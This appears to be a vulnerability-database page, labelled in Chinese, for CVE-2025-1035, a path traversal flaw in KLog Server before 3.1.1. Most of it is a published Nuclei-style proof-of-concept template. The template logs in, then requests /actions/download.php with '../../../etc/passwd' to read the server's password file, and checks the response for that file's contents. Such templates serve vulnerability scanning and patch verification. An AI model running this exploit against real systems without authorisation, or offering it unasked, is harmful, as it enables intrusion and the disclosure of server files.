漏洞描述
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Komtera Technolgies KLog Server allows Manipulating Web Input to File System Calls.This issue affects KLog Server: before 3.1.1.
CVE-2025-1035: KLog Server - Path Traversal
PoC代码[已公开]
id: CVE-2025-1035
info:
name: KLog Server - Path Traversal
author: s4e-io
severity: medium
description: |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Komtera Technolgies KLog Server allows Manipulating Web Input to File System Calls.This issue affects KLog Server: before 3.1.1.
reference:
- https://www.byresearchers.net/2025/02/cve-2025-1035-klog-server-31.html
- https://www.usom.gov.tr/bildirim/tr-25-0037
- https://www.cve.org/CVERecord?id=CVE-2025-1035
classification:
epss-score: 0.21834
epss-percentile: 0.95562
cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 5.7
cve-id: CVE-2025-1035
cwe-id: CWE-22
metadata:
verified: true
max-request: 2
vendor: klogserver
product: klog_server
tags: cve,cve2025,klog-server,lfi
variables:
filename: "{{to_lower(rand_text_alpha(6))}}"
http:
- raw:
- |
POST /actions/entree.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pswd={{password}}&action=login
- |
GET /actions/download.php?action=web&file=../../../etc/passwd&name={{filename}}.zip HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body_2)"
- 'contains_all(header_2, "application/octet-stream", "filename=")'
- 'status_code_2 == 200'
condition: and
# digest: 490a0046304402201845890908db9f734f57a648e48e93f352ea1933d2b42fd8b7fc8891bf457ea502206e1d1e2e73ab410e412e55f147e22247fa63ca51fef9dae6cfa5807d66a5c3ac:922c64590222798bb761d5b6d8e72950